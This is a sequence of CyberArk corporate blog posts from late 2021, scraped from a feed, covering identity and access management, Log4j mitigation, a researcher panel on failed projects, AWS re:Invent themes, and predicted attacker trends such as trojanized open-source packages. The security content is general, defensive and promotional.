Organizations have a major opportunity to empower their employees with applications that help them drive success for key initiatives, including apps that foster collaboration, creativity and a sense of community. The key is ensuring that your users’ engagement with these tools is secure — from the point of authentication, to the actions they take within the apps — and that their access is up to date, in light of any changes to their jobs.

In a world in which the so-called “future of work” is really anybody’s guess, we can count on the fact that every home office will be its own IT infrastructure, and the corporate perimeter requiring protection is essentially limitless, embedded into every identity. Getting ahead of the security risks of trends like the Great Resignation isn’t just forward thinking; it’s critical to securing your distributed workforce.

Read our new eBook “4 Global Workforce Trends Influencing Identity and Access Management Strategies” for insights on how to secure and empower your workforce.

4 Global Workforce Trends Influencing Identity and Access Management Strategies

[1] Gartner Press Release, “Gartner Survey Reveals a 44% Rise in Workers’ Use of Collaboration Tools Since 2019,” August 25, 2021. GARTNER is registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

]]>
When Threat Research Goes Wrong: Spectacular Screwups and What to Learn from Them https://www.cyberark.com/blog/when-threat-research-goes-wrong-spectacular-screwups-and-what-to-learn-from-them/ Tue, 21 Dec 2021 20:13:20 +0000 https://www.cyberark.com/?p=126018 When Threat Research Goes Wrong

Threat researchers on the cutting edge of cybersecurity have a certain kind of drive — almost a relentless need — to get into the attacker’s mind, solve the “unsolvable” challenge and expose emerging attack techniques. So, it’s not every day these elite researchers come together to share the secrets to their success, and it’s even less common to hear about their failures. But that’s exactly what happened at the inaugural INTENT Security Research Summit last month.

In one of the most popular sessions of the virtual event moderated by Erez Yalon, head of research at Checkmarx, security researchers from Intezer Labs, Claroty, CyberArk Labs and Palo Alto Networks got candid about times when things didn’t go exactly as planned, what they learned from these “spectacular screwups” and how their stories can benefit the global research community at large.

Never assume

One skipped step in a protocol stack vulnerability research project taught Sharon Brizinov, principal, vulnerability research, at Claroty, to never assume that which is incapable of proof. He shared how making one erroneous assumption led to a foiled project, pushback from a vendor who couldn’t reproduce the exploit he developed, and a close examination of existing research processes and procedures to make sure similar mistakes didn’t happen again.

Eran Shimony, senior vulnerability researcher at CyberArk Labs, recounted a time when he uncovered a supposed bug as part of his ongoing research on local privilege escalation vulnerabilities. After a week of reverse engineering and developing the exploit, he responsibly disclosed the flaw to the vendor. It was only after the vendor came back a few weeks later saying they were having difficulty running the exploit that he realized he had inadvertently designed it using admin privileges, making those “very cool bugs in the kernel” much less of a security issue.

Normalize failures

“Even though you never read about researchers’ failures on Reddit, Twitter and in other research publications, they are there,” said Brizinov. And not sharing these failures can create negative ripple effects such as survival bias, when research gets distorted because less-than-stellar results are overlooked or omitted altogether, he noted.

Sure, it can be humbling to admit your mistakes, but research is all about trial and error. “We all fail on a daily basis; it’s part of the job,” said Ari Eitan, VP of research, Intezer Labs. The more comfortable security researchers become with sharing their mistakes, the less they’ll be viewed as “mistakes” at all.

“The more we see others going through similar struggles — and experiencing similar failures — the more encouraged we’ll be to keep working hard to achieve our goals,” echoed Shimony.

Beat to the punch

Eitan recalled a time his team believed they had discovered a new ransomware sample. They dug deeper and ultimately decided to publish their research. After all, “there’s no benefit to having intel and keeping it to yourself,” he said, “But we took our time.” Little did they know another research team was working on the same thing. “Just two hours before our research launched, another vendor published findings on the exact same ransomware sample, just with a different name.”

Irena Damsky, director of research at Palo Alto Networks, shared a similar story from years ago at a previous research job. After identifying a threat vector, her team reached out to several other vendors to combine threat data and develop visualizations of the threat around the world. Each vendor planned to publish their research in tandem to maximize attention, but thanks to time zone mix-up, her team’s research didn’t get published until later in the day. “Things happen,” she noted, but especially when it comes to major research, “automate processes whenever you can” to help make sure nothing gets left to chance.

Let it go

It’s easy to learn from our own failures, but what happens when someone else is to blame?

Shimony shared a story in which he had disclosed a vulnerability to a vendor, and the vendor had privately confirmed that the flaw would be published as a CVE. Instead, the bug was patched but never acknowledged — and the vendor stopped responding to his follow-up emails. “There are instances when vendors don’t play by the rules, or even pull the ‘legal card,’ when they shouldn’t,” he noted.

The panel agreed some of the best things to do in such circumstances are to continue following all responsible disclosure protocols, not get overly discouraged when others don’t play “fair,” make sure your research is written clearly and can be understood by non-technical audiences, and ensure that all content goes through rigorous reviews by marketing, legal and product teams before publication.

The panel also stressed the importance of cultivating environments in which employees and team members are comfortable admitting to their mistakes — and empowered to learn from them without fear of criticism or consequence.

Learn from the process

Thomas Edison once said, “I have not failed. I’ve just found 10,000 ways that won’t work.”

Failure can lead to ultimate success and discovery, but it’s human nature to want to keep those setbacks to yourself. But the panel’s ultimate message was to push past this because there’s much to be learned from the imperfect process itself. Damsky credited her high school math teacher for instilling this important lesson. “The final answer to the question is not the most important thing — it’s also about how you get there and what you learn along the way,” she said.

]]>
Log4j: What to Know. What to Do. And How to Stay Ahead https://www.cyberark.com/blog/log4j-what-to-know-what-to-do-and-how-to-stay-ahead/ Thu, 16 Dec 2021 23:34:19 +0000 https://www.cyberark.com/?p=125754 Log4j-Vulnerability

In December 2020, a series of network breaches was reported in rapid succession — the beginning of what soon became known as the cyber attack that changed everything. By compromising identities and abusing privileges to take advantage of a routine software update, the sophisticated adversaries behind the landmark SolarWinds attack reached into more than 18,000 organizations, showing the world just how devastating a supply chain attack could be. Almost exactly a year later, the world faces a new threat of potentially equal — or even greater — proportions: the Log4j vulnerability that is putting “hundreds of millions of devices” at risk, according to U.S. CISA officials.

Here’s what you need to know about Log4j and six Identity Security best practices your organization should follow to reduce risk.

The Lowdown on Log4j: What You Need to Know About the Zero Day

On December 10, 2021, a critical security vulnerability in a widely used open-source software development library called Log4j (also referred to as “Log4Shell”) was published in CVE-2021-44228. Affecting Log4j versions 2.0-beta9 to 2.14.1, the flaw has the potential to cause data exfiltration and/or remote code execution on servers using this component for their logging functionality.

Log4Shell has quickly gained global attention because of its potential for far-reaching impact. The Log4j open-source software is ubiquitous, used either directly or indirectly (via third-party code) in the world’s most popular consumer applications and enterprise services. When left unmitigated, the remote code execution (RCE) vulnerability can enable an attacker to execute arbitrary Java code and take control of a target server.

Attackers reportedly began exploiting the vulnerability at the beginning of December 2021 (though it was inserted into the code in July 2017) and have ramped up efforts since the CVE’s publication — efforts include those by known ransomware groups.

Log4j Exploit Explained

Six Identity Security Best Practices to Reduce Log4Shell Risk

There are many ways in which attackers can leverage the Log4j vulnerability for nefarious purposes. And while there is no one vendor or tool that can completely prevent every arbitrary code execution attempt every time, these are steps organizations can take to protect identities, secure privileged access and minimize risk:

  1. Apply patches. If you haven’t already, take immediate steps to apply the software update already released by Apache in Log4j. It’s also important to review vendor recommendations and updates for all enterprise software platforms in use, along with any underlying OS and enterprise integrations. Check in with all your third-party vendors to make sure they’ve also patched the software you use.
  2. Deploy peripheral defenses. Apply web application firewall (WAF) rules to mitigate common exploitation attempts as part of a comprehensive defense-in-depth strategy.
  3. Protect the credentials served to servers. Restrict access to environment variables and local credentials stored in CI/CD pipelines to minimize immediate risks posed by opportunistic attackers. If an application requires a secret be handed over in an environment variable, use a secrets manager to help ensure only authenticated users get access to the clear text secrets.
  4. Protect Tier 0 assets. Only allow privileged access to specific bastion hosts to restrict access to Tier 0 assets like Active Directory and DevOps workflow orchestrators. This will make it exponentially more difficult for the attacker to escalate privileges and achieve a complete network compromise.
  5. Implement least privilege for both services and users. This step is critical in mitigating the risk of a targeted attack. Restricting access to the minimum level needed — and taking it away as soon as it’s not needed — can go a long way in slowing down or halting an attacker’s progress by preventing lateral movement, and ultimately, minimizing the blast radius (or overall impact).
  6. Enable Multi-Factor Authentication (MFA) whenever possible. Attackers are much more likely to succeed when they don’t have to provide a second authentication factor or another piece of approval to insert their code — so this is always a best practice.

CyberArk Endpoint Privilege Manager can help organizations protect their environment and mitigate Log4j vulnerability impact using advanced application control policies. Explore our technical documentation for details. For additional Log4j mitigation guidance, watch this on-demand webinar hosted by CyberArk Research Evangelist Andy Thompson. To learn how CyberArk is securing our own products against Log4j and other threats, please visit our Trust Center here. 

]]>
CISO Spotlight: Highmark Health’s Khawaja on Creating a Security-First Culture https://www.cyberark.com/blog/highmark-health-ciso-khawaja-security-first-culture/ Tue, 14 Dec 2021 14:25:27 +0000 https://www.cyberark.com/?p=125552 Highmark Health Omar Khawaja CISO Spotlight

Healthcare providers on the front lines are utilizing new approaches and technology to deliver personalized experiences that improve patient care and outcomes. For Omar Khawaja, chief information security officer at Highmark Health, this “people-first” philosophy is also central to driving transformation and security-first consciousness across one of the largest integrated health delivery and financing networks in the United States.

Khawaja recently made a guest appearance on our CyberTalk with CyberArk podcast, hosted by Cybercrime Magazine, where he reflected on navigating changes throughout the pandemic; the intersection of security, culture and measurement; and Highmark Health’s Zero Trust philosophy.

Following are some highlights from this popular episode.

 

Working as a team involves understanding when and how to be flexible. At the height of the COVID-19 pandemic, security organizations were forced to make significant and lasting changes. 

Khawaja described how his team has adapted in the face of pandemic-driven uncertainty.

“As was the case with organizations everywhere, it started with a very significant overdose of uncertainty. We went home and told our teams to do the same, thinking it would be for a few weeks. Then we thought it would be a few months. And the, we changed the question from ‘when are we going back to normal’ to ‘let’s figure out what the new normal is.’”

He also shared important lessons he’s personally embraced along the way, including the power of communication and empathetic leadership.

“During those initial months, I felt one of the biggest things I needed to do was show up with more humility. I’m used to having the answers — or being able to find them — for my team, and for the business. But in this case, no one had answers. The only option was to show up and be transparent, explaining what we knew, what we didn’t know, what questions and problems we were working to solve, and how we were going about that.”

He continued, “When you’re going through a difficult time — and definitely during a crisis — ongoing communication is critical. I went from holding a quarterly town hall with my team members to hosting weekly sessions to engage with them more frequently. Here we are, 80-plus-weeks later, and we’re still doing them. It’s not about project updates or security or risk; it’s about our team — how we’re working together, how we can prevent burnout, how we can support and care for one another.”

Yet Highmark Health is no stranger to change. With a long history of successful mergers and acquisitions, the organization spans more than 35,000 employees covering the insurance needs of more than 6 million members today. Through this rapid growth, Highmark Health continues to execute its mission to create remarkable health experiences, freeing people to be their best. But it also opens the door to new cyber threats.  Khawaja discussed the challenges — and opportunities — that come with the territory and the importance of keeping the “big picture” in mind.

“The security function exists to support the business. When the business wants to expand and deliver to the needs of our communities and customers, that’s an extremely positive thing. For our team, it’s about rethinking how we deliver security — from threat detection to privileged access management to data loss prevention — at 10X, 20X the scale and do it in 60, 70, 80 or even 90 percent less time.”

He continued, “We’re focused on using lots of automation to work smarter — stepping back to realize we’re going to have this happen hundreds of times and reimagine certain parts of the security program to be able to deliver at scale and meet the needs of the customer. And a lot of that means even closer alignment with the business.”

Bridging both healthcare and insurance, Highmark Health must continuously safeguard an ever-expanding trove of sensitive customer data — the ultimate asset. In recent years, as the organization has accelerated its move to the cloud, the team has embraced Zero Trust as a common architecture and overarching mindset as it works to protect sensitive data and assets.

“Zero Trust is part of our DNA — one of the four pillars of our security program. But it’s not about implementing technology — it’s more about operating security with Zero Trust in mind. We look to reduce the amount of access individuals have; we don’t trust everyone who attempts to connect to our systems; and we assume that users are connecting from end user devices that are already infected. Certainly, in the case of increasing ‘work from home’ programs — what we call “work from anywhere” in our world — philosophies like Zero Trust are very applicable.”

For a successful cybersecurity program to take hold, a security-first consciousness must extend to individual members of the organization The 2021 Verizon Data Breach Investigations Report found that 85% of data breaches involve a human element, but it’s not for lack of awareness. Everyone knows they shouldn’t share passwords or click suspicious links but how well does that knowledge translate?

“It’s not enough to say everyone should take annual security training or just do phishing exercises. The problem with training is that everyone leaves thinking that it applies to others first. It’s not very actionable because it doesn’t tell us how we’re doing. We all think we’re doing well in the absence of specific feedback to tell us otherwise.”

He continued, “Everyone is already aware of the basics of cyber hygiene. But when an incident occurs, the individuals involved almost always say, ‘I should have been more careful.’ The issue is not a lack of awareness or knowledge. It’s about changing behavior, and training is just one tool to accomplish that.”

Highmark Health’s implementation of a “cyber score” program has deeply engrained security into organizational psychology. Rather than creating awareness, this measurement provides each individual employee with feedback on their own security practices. With real, actionable feedback, employees are empowered to make improvements to their individual behavior.

“(Management consultant, educator and author) Peter Drucker was right when he said, ‘what gets measured gets managed.’ If we don’t have a way of measuring human risk, it’s really challenging to effectively manage it.” He continued, “It’s all about value realization, and in this case, we’re focused on changing the culture.

“Most theories of change management tell us that the single most effective person to influence any individual in an enterprise is not the CEO — it’s their direct supervisor. So, with that understanding, I’m focused on arming every single individual manager to be able to have that conversation with the people who report to them. Because they’ve got more influence on the people who report to them than anyone else in the organization.”

The Highmark Health cyber score program has empowered managers at every level of the organization to initiate conversations about security. Khawaja also noted that when managers and employees have sufficient feedback and feel empowered regarding their security choices, real change blossoms.

“Over 10,000 people in our enterprise completed security training — not because I made them, or their boss made them, or compliance made them, but simply because they wanted to improve their cyber score. Culture changes are based on each individual changing.”

The advent of Highmark Health’s innovative cyber score program isn’t your average security training it meets individual employees where they are and motivates them to change their patterns of behavior. If we truly want users to embrace security as a mindset and lifestyle, we must take the time to understand what makes them tick — and partner closely with business stakeholders to drive engagement and meaningful change.

Editor’s Note: Answers have been edited for length and clarity. Access the full interview here — or wherever you get your podcasts. 

]]>
Cloud Identity Security – Key Themes from AWS re:Invent 2021 https://www.cyberark.com/blog/cloud-identity-security-key-themes-from-aws-reinvent-2021/ Fri, 10 Dec 2021 14:28:09 +0000 https://www.cyberark.com/?p=125530 AWS reInvent Cloud Security Takeaways

Last week, CyberArk attendees from around the world joined the global cloud computing community in Las Vegas for AWS re:Invent 2021.

This year’s landmark, 10th-annual conference focused on cloud-hosted services’ critical role in transforming industries — from airlines to financial services to government. In his keynote, AWS CEO Adam Selipsky noted that “there’s no industry that hasn’t been touched by the cloud.” The full conference illustrated how cloud-hosted applications enabling remote work to the cloud-hosted infrastructure powering vaccine development have built the foundation for contemporary times.

But the distributed nature of modern computing has led to a proliferation of identities with access to public cloud resources. In highly dynamic, rapidly scaling environments, enabling secure access for all human and machine identities is increasingly important. As AWS CTO Werner Vogels said in his keynote, “Protecting your customers should forever be your No. 1 priority.”

The following are some of the key security trends and topics gleaned from the conference’s keynotes and sessions — and from the expo floor itself.

Three key security themes from re:Invent 2021:

1) Technology is changing the need for least privilege is not.

AWS is innovating at a blistering pace; at re:Invent alone, the company introduced more than 50 new features for its portfolio of services.

At the conference, AWS highlighted that consistently securing access to these powerful technologies requires organizations to implement least privilege access — helping to ensure that all human and machine identities possess only the minimum necessary permissions to complete their tasks.

Through dedicated sessions on implementing least privilege with AWS Identity Services and hyper-focused sessions on security for next-gen infrastructure such as serverless functions, AWS experts stressed the need for thorough authorization and authentication controls.

Another telling detail illustrating how core least privilege and other Identity Security controls are core to AWS and the philosophy of its practitioners was on display in the re:Invent security leadership session — AWS Identity’s principal product manager presented a photo of her six-word vanity license plate: “USE MFA.” Yes, it’s a driving force.

2) Shift left: simple, automated security for modern infrastructure

At the scale of the modern enterprise, consistent security is essential. In his keynote, Vogels emphasized the need for straightforward security policies that can reach hyperscale, providing the “under-the-hood” example of AWS Identity and Access Management (IAM) handling more than a half billion API calls per second. Any service operating at that scale would have once been unfathomable. Not in 2021.

Vogels said, AWS needs “… to keep simplicity in mind because, otherwise, you cannot [reach] the scale IAM needs to meet.” He also noted the foundation for this principle is Gall’s law — which states that all complex systems that work evolved from simpler systems that worked.

Sessions and announcements throughout the conference echoed the connection among automation, scalability and security.

Additionally, several sessions positioned infrastructure-as-code (IaC) deployment methods like AWS CloudFormation as the key to automating simple, scalable and secure configurations for new environments and services.

For example, one session titled, “Best practices for securing your software delivery lifecycle,” underscored the importance of enforcing both security in the CI/CD pipeline (through tools like secrets management and application vulnerability scanning) and security of the pipeline (through ongoing monitoring and threat detection). This language, of course, deeply echoes the AWS shared responsibility model that underpins the provider’s security philosophy.

Another popular session focused on the role of automation in both generating and validating appropriate IAM policies on the fly within CI/CD pipelines. Collectively, these sessions and details indicate a future in which least privilege access and just-in-time provisioning will remain essential ingredients in cloud security.

Automation is even more important as AWS continues to, yes, reinvent enterprise infrastructure. AWS continues to make container-based and serverless deployments increasingly accessible — and increasingly secure. Several AWS services, including RedShift (big data) and Amazon SageMaker (machine learning), added serverless deployment options at re:Invent, lowering the total cost of ownership for these groundbreaking technologies.

Simultaneously, AWS used the re:Invent spotlight to reveal easier than ever before adoption of containerized environments. The company introduced a new AWS Marketplace for Containers, which enables organizations to identify and deploy subscriptions to third-party Kubernetes applications. And following its own advice, AWS also pre-announced that its Amazon GuardDuty service for discovering threats will extend into containerized environments.

3) Securing cloud migrations requires people, processes and technology

Securing all identities accessing sensitive resources during a cloud migration is no easy task. It requires deep expertise, tailored technologies and careful planning. This message resonated throughout our meetings with CyberArk customers and peers at AWS, who repeatedly called back to the AWS Migration Acceleration Program (MAP).

MAP emphasizes the importance of assessing cloud readiness, mobilizing resources and technologies, and ultimately, migrating and modernizing workloads with the help of expert partners.

In the re:Invent Security Leadership session, AWS leaders emphasized the importance of people, processes and technology for all cloud security processes. The company even spotlighted its own security culture and teams to demonstrate some cybersecurity best practices in action, including:

  • Investing heavily in employee education on cybersecurity awareness training (people)
  • Consistently verifying least privilege and reviewing unintended access to company resources — both technological and physical (processes)
  • Widely investing in threat detection and consistent monitoring that covers all identities accessing cloud resources (technology)

Want to learn more about the value that CyberArk Identity Security Platform can quickly add to your cloud migration? Check out our listings on AWS Marketplace.

]]>
Simplify Identity Security with this How-to Guide (for Dummies) https://www.cyberark.com/blog/simplify-identity-security-with-this-how-to-guide-for-dummies/ Wed, 08 Dec 2021 14:25:52 +0000 https://www.cyberark.com/?p=125303

In season three of The Office, prankster Jim Halpert impersonates his coworker Dwight in what has become one of the show’s most iconic cold opens. While Jim only intends to tease, his prank is more poignant than he perhaps realizes. Together, we all learned from Dwight that “identity theft is not a joke” (and that bears don’t eat beets). We may have laughed then, but it’s true — especially when it comes to the “perimeterless” enterprise networks and cloud-based technologies and services empowering most digital enterprises today.

But first, let’s start with a definition. In the enterprise sense, when we talk about a “digital identity,” we’re talking about someone or something associated with an organization. That could mean an employee or customer or partner — or it could mean a non-human device, application or even a bot. There are also policies attached to a digital identity to describe the level of access that particular entity has to company resources and sensitive data.

Converging trends such as the adoption of SaaS, public cloud-based tools and flexible work-from-home policies have dramatically increased the numbers and types of identities within organizations. This explosive growth has created a host of new Identity and Access Management (IAM) challenges, prompting a surge in identity-related data breaches and necessitating a shift in how companies approach cybersecurity at a fundamental level. The convergence of these trends has given rise to the need for Identity Security. Identity Security is a holistic, risk-based approach to securing human and machine identities to protect sensitive enterprise applications, infrastructure and data. It offers a set of technologies that are foundational to achieving Zero Trust — a popular cybersecurity framework requiring every identity, whether internal or external, to be authenticated and authorized before access is granted.

“Zero Trust” and other popular industry phrases like “assume breach” and “defense-in-depth” are often associated with Identity Security-related topics but understanding how they’re all connected can be tricky. Even IAM teams often say they could use some help in communicating the importance and inner workings of Identity Security in ways that various stakeholders can easily understand.

That’s why a simple how-to guide can come in handy and why we recently published our own version of the popular “For Dummies” book series. Highlighting plenty of real-world examples without the technical jargon, “Identity Security for Dummies” aims to make this important security topic more approachable.

Download it, bookmark it, even print it out (if that’s still your thing) — and refer to it whenever you’re looking for simple definitions and quick answers. For instance, you can dig into these six actionable steps for accelerating your Identity Security program:

1. Prioritize your Identity Security landscape

Most cyber attacks begin with identity compromise. After acquiring a valid set of credentials for an identity, attackers often work to uncover new levels of access — or “escalate privileges” — by targeting privileged accounts that open doors to IT systems, public cloud infrastructure, business applications, sensitive data and more.

While privileged accounts are often the No. 1 target for attackers, many organizations are unaware of the volume and location of privileged accounts throughout their IT environments. And on a very basic level, it’s tough to protect what you can’t see — or don’t even know about.

Implementing a successful Identity Security program starts with taking inventory of privileged accounts, credentials and misconfigurations that can create risk, and making note of what systems and data are most likely to be targeted. Once those have been identified, take stock of who (or what) has access to those high-risk assets.

Prioritize securing the most important things first — that means protecting the data most sensitive to your organization. Then you can work toward those assets that are less sensitive. Keep in mind that attackers may attack at a slant — looking for a foothold that they can use to pivot to bigger and better things.

2. Identify potential “new” targets

Once existing highest-priority assets are protected, then you can start planning for the future. That includes following where the logins are coming from and monitoring processes and procedures (both manual and automatic). Analytics and automation can be extremely helpful when it comes to sifting through logs associated with sensitive applications to understand who or what accessed what resource, when, for how long and for what purpose — helping you avoid the overwhelm of “analysis paralysis.”

3. Implement effective Multi-factor Authentication 

Multi-factor Authentication (MFA) is an important control to help keep an identity from becoming compromised. However, MFA itself is not perfect. End users can still be tricked, no matter how well they paid attention to the last security training.

There are ways to tighten up MFA to help reduce the risk and keep it effective, including tools like biometrics (fingerprint or face recognition, for instance), push notifications on smart devices, device certificates (digital identifiers on approved devices) and more. Reducing manual password use not only increases the strength of security, but it also creates seamless logins for users — an operational and security win.

4. Protect high-risk access with Privileged Access Management

As organizations embrace cloud, DevOps, automation, IoT and more, the need for protecting privileged access continues to grow. Privileged Access Management (PAM) solutions are used to limit risk regarding infrastructure and administrative access to sensitive applications, systems and data. PAM solutions help manage, monitor and control access so that identities — human or machine — only have enough access to do what they are meant to do — nothing more, nothing less.

5. Allow just enough access to get things done

Privileged Access Management programs dovetail into a least privilege, Just-In-Time (JIT) approach for privileged access. JIT combines the concept of least privilege access with a time-based element. Users have the proper permissions and access for only a specific amount of time to resources necessary to do their job.

6. Motivate cultural change

Embracing an Identity Security approach on the path to Zero Trust isn’t just a “one and done” program. It’s also a mindset and requires a cultural shift that demands involvement and action from stakeholders beyond traditional IT infrastructure and security teams.

While quick action and risk reduction can be attained, deploying comprehensive Identity Security controls across mid- to large-sized organizations will happen in iterations and calculated and prioritized based on your greatest risks.

Communication and Organizational Change Management (OCM) is key for Identity Security programs to succeed — and support must come from the top. Beyond communicating security benefits, users should understand how Identity Security can benefit their daily work lives and improve operations while reducing risk.

Identity Security for Dummies

So, where to begin with Identity Security? Zero Trust provides a strategic lens to evaluate where your organization stands today. And whether you’re just getting started on your Identity Security journey or taking your program to the next level, “Identity Security for Dummies” can help drive focus and overall progress toward your goals. With everyone looking through the same lens, you can determine the strength of your posture and come up with your next move. We suspect Dwight Schrute would approve.

 

]]>
Cybersecurity Trends for 2022: The Roots of Attacker Innovation https://www.cyberark.com/blog/cybersecurity-trends-for-2022-the-roots-of-attacker-innovation/ Fri, 03 Dec 2021 13:58:44 +0000 https://www.cyberark.com/?p=125229 2020 Cybersecurity Attacker Innovations

The Greek philosopher Heraclitus once said “the only constant is change.” This still rings true thousands of years later — particularly as we reflect on 2021, another year marked by continued shifts that pushed enterprises to adopt new strategies to strengthen resilience. Similarly, adversaries continued to refine their methods to work smarter and move faster to scale attacks, extend deeper into supply chains and cause greater damage.

The CyberArk Labs team has observed early glimpses of evolving attacker innovation; each has the potential to significantly alter the cybersecurity landscape over the next 12 months.

Innovation 1: Underground Enterprises Will Get Caught at Their Own Games, Forcing a Security Revamp

DevOps is changing the way business is done, and underground criminal enterprises are certainly no exception.

Just like legitimate software vendors, attackers are using CI/CD pipelines, cloud infrastructure and other digital technologies to develop and sell new malware as a service (MaaS) offerings. The need to rapidly push new features to market is driven by growing (underground) demand for popular tools like credential theft malware that can be configured to surreptitiously gather user credentials and pillage privileged information from victims. Such malware is not only powerful, but it is also simple to use right out of the box, emboldening novice attackers and strengthening sophisticated nation states alike.

Attacker groups are pulling on strengths from various stakeholders to monetize these services and grow their operations — from developers writing the exploit code, to engineers architecting the attack infrastructure, to attackers using these new exploits in the wild to target victim networks.

Yet as these criminal groups start to appear more and more like “real” businesses, they’ll also open themselves up to new risks. Just like any other enterprise, they’ll face new security challenges in managing multi-tenant SaaS applications, securing remote access to sensitive systems and data and more. While being forced to ramp up their own security protections, adversaries will increasingly get caught by defenders using their own offensive tactics against them.

Innovation 2: Attackers Will Employ OSS to Automate and Magnify Supply Chain Attacks

Our digital economy runs on open source software (OSS) — it’s flexible, scalable and harnesses collective community power to spark new innovations. But countless “open” and “free” OSS libraries also mean a dramatically expanded attack surface and a way for threat actors to automate their efforts, sidestep detection and do more harm.

The April 2021 Codecov breach gave us a glimpse of how one subtle tweak in one line of code can turn a completely benign library into a malicious one — putting any organization using it at risk. Using this highly evasive infiltration method, attackers can target and steal credentials to reach thousands of organizations across a supply chain in unison.

In the next 12 months, attackers will continue looking for new ways to compromise open source libraries. We have seen attackers implementing typosquatting-like attacks by creating code packages that include subtle changes to the packages’ names (i.e., atlas-client vs. atlas_client). These were actually trojanized versions of the original packages, which implement or download a backdoor or credential-stealing functionality. In another case, an NPM package was trojanized to run cryptomining script and credential theft malware after a developer’s credentials were compromised.

Organizations must remain vigilant, as these subtle attacks will rarely send up signals, making them extremely difficult to spot — especially as such libraries are deployed into the pipeline as part of legitimate day-to-day operations, and in many cases, may look benign as the malicious code is downloaded as a dependency. What’s more, since these automated attacks are easy and quick to execute with a very limited signature, they’ll become even more frequent, sudden and damaging.

Innovation 3: Brand New Spots Will Help Attackers Hide in Plain Sight

As if it’s not already tricky enough, security is going to get even more complicated, thanks to new hiding places introduced by cloud, virtualization and container technologies. 

For instance, as micro virtualization becomes increasingly popular, threat actors can isolate malware in these virtual systems while keeping it hidden from host-based security controls.

While these new attack techniques haven’t been seen much in the wild … at least not yet, financially motivated and nation state threat actors have been observed testing systems such as Windows Subsystem for Linux (WSL) — a subsystem that secures credential and authentication processes — as they look for new ways to compromise endpoint machines.

By running ransomware within a Linux infrastructure, for example, Endpoint Detection and Response (EDR) and other host-based endpoint security tools cannot typically identify the malicious activity, making it possible for attackers to encrypt or exfiltrate data with ease — all while hiding in plain sight.

Editor’s note: To stay on top of emerging cybersecurity threats and original research from CyberArk Labs and the CyberArk Red Team, visit the CyberArk Threat Research Blog.

 

 

 

]]>
Identity and Access Management is Changing: Here’s Where It’s Headed https://www.cyberark.com/blog/identity-and-access-management-is-changing-heres-where-its-headed/ Wed, 01 Dec 2021 13:00:29 +0000 https://www.cyberark.com/?p=125215 Archit Lohokare on Access Management

We’re living in an exciting, highly dynamic world that is driven by rapidly evolving technology. To grow and compete, organizations have accelerated the pace of their digital transformation initiatives by seven years, according to McKinsey & Company. Yet the popular maxim “move fast and break things” sometimes means security gets left behind.

It’s easy to see how this can happen: traditional security threat prevention technologies have relied largely on network-based security controls. They have monolithic architectures, which are manual and tedious. They have policy-based authorization controls that barely have a semblance of session security. They burden users with session timeouts and terminate session options, and their audit and compliance capabilities are either missing or very costly.

Fortunately, the tide has started to turn in the last few years, with SaaS-based Identity and Access Management (IAM) moving higher on enterprise security teams’ priority lists. In particular, access management tools are designed to reflect today’s boundary-less enterprise reality and place identity at the core of security by using smart, conditional authentication and authorization mechanisms.

Yet nearly all these current access technologies stop at the authentication layer, providing very few, if any, session controls to monitor access to — and interactions with — sensitive or privileged resources. Without such controls in place, malicious insiders and external actors alike have a better chance of progressing their attacks without detection.

The Evolution of Access Management

As the lines continue to blur between identity and privilege, organizations need ways to confidently verify that workforce identities — requiring various levels of access at various times and from various locations — are indeed who they say they are, that their devices are verified and that their access is intelligently limited to exactly what’s required.

This is where artificial intelligence (AI) comes in and where the next wave of access management innovation is focused.

Using machine learning and contextual signals — including user data, device data and activity data — these access management solutions are constantly getting smarter and building more descriptive, visual risk profiles of individual human and machine identities. This helps organizations strengthen predictive capabilities so they can better anticipate and mitigate future threats. And through AI, these solutions can also determine when a user is low risk and legitimate, serving up a simplified authentication experience that allows users to access the apps they need to do their jobs.

When integrated into a unified platform, these AI-powered tools work even harder together to deliver higher quality data sets, fine-tune algorithms that can reliably differentiate between anomalous and malicious access attempts and automate responses while providing a real-time feedback loop to the organization’s machine learning engine to constantly improve performance.

The Journey Toward Passwordless Authentication

Passwordless authentication is a great example of an intelligent Identity Security approach in action — and represents a huge opportunity for organizations focused on securing their anytime, anywhere workforces.

I often find myself using this quote: “In today’s world, attackers don’t really need to hack in; they just log in.” It’s true. Traditional passwords and credentials remain one of the leading causes of identity-related attacks and breaches for numerous reasons. And attackers particularly target privileged credentials  that enable access to sensitive systems and networks since they’re able to get so much information from just one source.

Industry research points to growing consumer comfort and confidence in passwordless authentication, such as biometric authentication methods (e.g., facial recognition and fingerprints) and behavior-based methods (e.g., passively observed signals that require no effort from the user). But when it comes to the enterprise, achieving true passwordless authentication won’t be like flipping a switch — it’s a journey that starts with giving your organization and its people and users the right processes and tools.

You can start by giving users access to a range of passwordless authenticators, such as FIDO2 security keys, biometrics, QR codes and magic links. These authenticators need to come with frictionless, intuitive self-service management capabilities to help make sure that users don’t get locked out of systems while trying to get their work done. Next, it’s important to make sure that all resources — from applications, to servers, to endpoints — are protected by comprehensive IAM solutions, whether they are hosted on-premises or in a hybrid environment. Finally, it’s important to have the systems and structure in place to measure key performance indicators and compliance around these passwordless initiatives so you can drive continuous improvements.

How to Achieve Zero Trust Through Holistic Identity and Access Security

Passwordless authentication is one technology in a broader set of Identity Security solutions that paves the way for Zero Trust, the widely accepted “trust nothing, verify everything” security philosophy.

At CyberArk, our Zero Trust vision brings concepts of “Zero Trust Access” and “Zero Trust Privilege” together. Zero Trust Access aims to ensure that every user and device is validated and that all access is intelligently limited based on the principle of least privilege. Zero Trust Privilege, on the other hand, works to secure and monitor privileged accounts and access, granting just-in-time, just-enough privilege for users so they can stay productive. This holistic, risk-based approach encompasses all identities, whether they are human identities, such as administrators, DevOps, workforce or vendor users, or nonhuman identities, such as machines and RPA bots, to help organizations protect their applications, infrastructure and data.

I recently spoke with Tom Field of Information Security Media Group to dig into the ever-evolving IAM technology landscape, how security leaders can incorporate solutions that emphasize frictionless user experiences and AI-powered security and ways to instill a security-first mindset across an organization to boost overall confidence and agility. You can check out our entire conversation here or click on the tile below.

The Evolution - and Revolution - of Access

Archit Lohokare is VP of Product Management at CyberArk.

]]>
Unwrapping Retail’s Cloud Security and eCommerce Risks this Holiday Season https://www.cyberark.com/blog/unwrapping-retails-cloud-security-and-ecommerce-risks-this-holiday-season/ Wed, 24 Nov 2021 15:21:19 +0000 https://www.cyberark.com/?p=124939 Retail’s Cloud Security and eCommerce Risks this Holiday Season

